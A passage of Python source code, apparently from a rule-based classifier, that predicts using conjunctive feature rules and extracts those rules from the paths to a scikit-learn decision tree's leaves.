dfn.columns = [name.strip() + '_neg' for name in df.columns]
df = pd.concat([df,dfn],axis = 1)
for i,rule in enumerate(rules):
Z[i] = (np.sum(df[list(rule)],axis=1)==len(rule)).astype(int)
Yhat = (np.sum(Z,axis=0)>0).astype(int)
return Yhat
def extract_rules(tree, feature_names):
left = tree.tree_.children_left
right = tree.tree_.children_right
threshold = tree.tree_.threshold
features = [feature_names[i] for i in tree.tree_.feature]
# get ids of child nodes
idx = np.argwhere(left == -1)[:,0]
def recurse(left, right, child, lineage=None):
if lineage is None:
lineage = []
if child in left:
parent = np.where(left == child)[0].item()
suffix = '_neg'
else:
parent = np.where(right == child)[0].item()
suffix = ''
# lineage.append((parent, split, threshold[parent], features[parent]))
lineage.append((features[parent].strip()+suffix))
if parent == 0:
lineage.reverse()
return lineage
else:
return recurse(left, right, parent, lineage)
rules = []
for child in idx:
rule = []
for node in recurse(left, right, child):
rule.append(node)
rules.append(rule)
return rules
| mit | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.